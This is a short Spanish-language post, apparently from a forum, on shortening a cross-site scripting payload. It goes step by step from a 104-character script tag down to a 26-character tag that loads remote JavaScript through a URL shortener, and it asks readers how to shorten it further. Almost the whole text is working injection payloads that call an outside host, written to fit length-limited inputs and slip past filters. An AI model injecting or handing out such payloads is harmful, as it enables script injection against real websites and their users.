Acortar ataque "XSS" = Cross-site Scripting

Que es este ataque y como funciona?

[+] http://es.wikipedia.org/wiki/Cross-site_scripting

XSS Original!

<script type="text/javascript" src="http://www.zff.co/Webservices/jsParseLinks.aspx?id=xxxxxx"></script>
104 Caracteres 

XSS shortener 1: (Sacamos type="text/javascript")
<script src="http://www.zff.co/Webservices/jsParseLinks.aspx?id=xxxxxx"></script>
81 Caracteres 


XSS shortener 2: (Con url shortener http://f.nu/) 
<script src="http://www.f.nu/XXX"></script>
43 Caracteres 

XSS shortener 3: (Sacamos http: y www y solo dejamos solo //) 
<script src="//f.nu/XXX"></script>
34 Caracteres 

XSS shortener 4: (Sacamos </script> y agregamos "/> ) 
<script src="//f.nu/XXX"/>

Llege a 26 Caracteres, Se puede mas?